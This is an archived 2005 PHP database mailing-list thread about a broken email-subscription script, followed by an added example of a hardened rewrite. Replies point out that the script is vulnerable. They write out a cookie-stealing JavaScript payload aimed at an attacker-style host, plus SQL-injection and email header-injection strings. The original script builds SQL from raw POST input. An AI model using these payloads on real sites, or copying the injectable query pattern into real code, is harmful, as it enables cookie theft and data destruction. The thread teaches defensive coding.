Re: [PHP-DB] insert (database)

2005-02-03 Thread Jochem Maas
Martin Norland wrote:
Jochem Maas wrote:
Yemi Obembe wrote:
the objective of the script below is to first search if a subscriber 
is already in a list before subscribing his email (so as to prevent 
double subscription). the select part works fine but the insert 
doesn't. know why?
 
if ($v = strtolower($_POST['email'])) {

what happens when $_POST['email'] is equal to
'
document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
';
or something like that? Just something to think about.

Then the malicious user gets to send their own cookies for this site to 
another site of their choosing :P.  I would be more worried about it 
being equal to things like:

"Spam my Enemy <[EMAIL PROTECTED]>"
+ "Spam my Enemy also <[EMAIL PROTECTED]>"
+ etc.
  or
"\r\nFrom: Idiots Inc. <[EMAIL PROTECTED]>"
  or
"'; Delete from arbitrary_table_name where 'yes'='yes"

ah yes - that would be an effective attack in/on an email ;-)

All of which are easily prevented with some attention to detail.  (or in 
some cases newer versions of software, which explicitly allow only one 
statement per call).  Finally - the concept of bind variables (or 
equivalent) is your friend (as Jochem already knows with firebird iirc).

yes indeed! praise to the guy who wrote the new firebird extension :-), 
savin' my ass on a daily basis :-)

Cheers,
--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP-DB] insert (database)

2005-02-02 Thread Martin Norland
Jochem Maas wrote:
Yemi Obembe wrote:
the objective of the script below is to first search if a subscriber 
is already in a list before subscribing his email (so as to prevent 
double subscription). the select part works fine but the insert 
doesn't. know why?
 
if ($v = strtolower($_POST['email'])) {

what happens when $_POST['email'] is equal to
'
document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
';
or something like that? Just something to think about.
Then the malicious user gets to send their own cookies for this site to 
another site of their choosing :P.  I would be more worried about it 
being equal to things like:

"Spam my Enemy <[EMAIL PROTECTED]>"
+ "Spam my Enemy also <[EMAIL PROTECTED]>"
+ etc.
  or
"\r\nFrom: Idiots Inc. <[EMAIL PROTECTED]>"
  or
"'; Delete from arbitrary_table_name where 'yes'='yes"
All of which are easily prevented with some attention to detail.  (or in 
some cases newer versions of software, which explicitly allow only one 
statement per call).  Finally - the concept of bind variables (or 
equivalent) is your friend (as Jochem already knows with firebird iirc).

Cheers,
--
- Martin Norland, Database / Web Developer, International Outreach x3257
The opinion(s) contained within this email do not necessarily represent 
those of St. Jude Children's Research Hospital.

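As an added example, not code from any poster in this thread, here is the subscribe check rewritten along Martin's lines: bound parameters so the quote-and-semicolon and header payloads above are treated as data rather than SQL, plus address validation, a UNIQUE column and HTML-escaped output. It assumes a table named arcadia with a UNIQUE email column and uses PDO (the replacement for the old mysql_* extension) with the sqlite driver purely so it runs stand-alone; for MySQL only the DSN changes.

```php
<?php
// Added example (not any poster's code): the thread's check-then-insert with bound
// parameters, validation, a UNIQUE constraint and escaped output. Assumes a table
// `arcadia` with a UNIQUE email column; sqlite in-memory is only so it runs stand-alone.

function connect(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // UNIQUE makes "no double subscription" a database guarantee even when two
    // requests race between the SELECT and the INSERT
    $db->exec('CREATE TABLE arcadia (id INTEGER PRIMARY KEY, email TEXT NOT NULL UNIQUE)');
    return $db;
}

// Returns 'invalid', 'duplicate' or 'subscribed'; $rawEmail never enters the SQL text
function subscribe(PDO $db, string $rawEmail): string {
    $email = strtolower(trim($rawEmail));
    // One well-formed address only: rejects the "\r\nFrom: ..." and multi-recipient strings
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return 'invalid';
    }
    $check = $db->prepare('SELECT 1 FROM arcadia WHERE email = :email');
    $check->execute([':email' => $email]);
    if ($check->fetchColumn() !== false) {
        return 'duplicate';
    }
    try {
        $db->prepare('INSERT INTO arcadia (email) VALUES (:email)')->execute([':email' => $email]);
    } catch (PDOException $e) {
        return 'duplicate'; // lost a race with an identical concurrent insert: UNIQUE fired
    }
    return 'subscribed';
}

// Echoing the value back is where a document.location payload would run; escape it as text
function render(string $status, string $rawEmail): string {
    $safe = htmlspecialchars($rawEmail, ENT_QUOTES, 'UTF-8');
    $messages = ['subscribed' => "Your email: $safe subscribed!",
                 'duplicate'  => "Your email: $safe already in the list"];
    return $messages[$status] ?? 'That does not look like an email address.';
}

// Constructed inputs: a valid address twice, one with a legal quote, two of Martin's payloads
$db = connect();
foreach (["Someone@example.org", "someone@example.org", "o'neil@example.org",
          "'; Delete from arcadia where 'yes'='yes", "\r\nFrom: Idiots Inc. <x@example.org>"] as $in) {
    echo render(subscribe($db, $in), $in), "\n";
}
```

The third input is the interesting one: the apostrophe is legal in an address and would have broken the interpolated query in the original script, but the bound parameter stores it as-is.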


RE: [PHP-DB] insert (database)

2005-02-02 Thread Bastien Koert
try
if (mysql_num_rows($res) > 0) {
    echo "Your email: $v already in the list";
}
else {
    $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
    $result_in = mysql_query($sql_in);
    echo "Your email: $v subscribed!";
}
}
else {
    include("index.php");
    exit;
}
bastien

From: Yemi Obembe <[EMAIL PROTECTED]>
To: php-db@lists.php.net
Subject: [PHP-DB] insert (database)
Date: Wed, 2 Feb 2005 01:23:16 -0800 (PST)
the objective of the script below is to first search if a subscriber is 
already in a list before subscribing his email (so as to prevent double 
subscription). the select part works fine but the insert doesn't. know 
why?

if ($v = strtolower($_POST['email'])) {
    $db = mysql_connect(mysql, "usser", "pw");
    $con = mysql_select_db("ng", $db);
    $sql = "SELECT * FROM mytable WHERE email='$v'";
    $res = mysql_query($sql);
    if ($row = mysql_fetch_array($res)) {
        echo "Your email: $v already in the list";
    }
    else {
        $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
        $result_in = mysql_query($sql_in);
        echo "Your email: $v subscribed!";
    }
}
else {
    include("index.php");
    exit;
}

-
A passion till tomorrow,
Opeyemi Obembe | ng.clawz.com


-
Do you Yahoo!?
 Yahoo! Search presents - Jib Jab's 'Second Term'


Re: [PHP-DB] insert (database)

2005-02-02 Thread Jochem Maas
Yemi Obembe wrote:
the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works fine but the insert doesn't. know why?
 
if ($v = strtolower($_POST['email'])) {
what happens when $_POST['email'] is equal to
'
document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
';
or something like that? Just something to think about.
    $db = mysql_connect(mysql, "usser", "pw");
    $con = mysql_select_db("ng", $db);
    $sql = "SELECT * FROM mytable WHERE email='$v'";
    $res = mysql_query($sql);
    if ($row = mysql_fetch_array($res)) {
        echo "Your email: $v already in the list";
    }
    else {
        $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
        $result_in = mysql_query($sql_in);
        echo "Your email: $v subscribed!";
you use different table names in each query. is that the intention?
    }
}
else {
    include("index.php");
    exit;
}

-
A passion till tomorrow,
Opeyemi Obembe | ng.clawz.com





[PHP-DB] insert (database)

2005-02-02 Thread Yemi Obembe
the objective of the script below is to first search if a subscriber is already 
in a list before subscribing his email (so as to prevent double subscription). 
the select part works fine but the insert doesn't. know why?
 
if ($v = strtolower($_POST['email'])) {
    $db = mysql_connect(mysql, "usser", "pw");
    $con = mysql_select_db("ng", $db);
    $sql = "SELECT * FROM mytable WHERE email='$v'";
    $res = mysql_query($sql);
    if ($row = mysql_fetch_array($res)) {
        echo "Your email: $v already in the list";
    }
    else {
        $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
        $result_in = mysql_query($sql_in);
        echo "Your email: $v subscribed!";
    }
}
else {
    include("index.php");
    exit;
}



-

A passion till tomorrow,
Opeyemi Obembe | ng.clawz.com





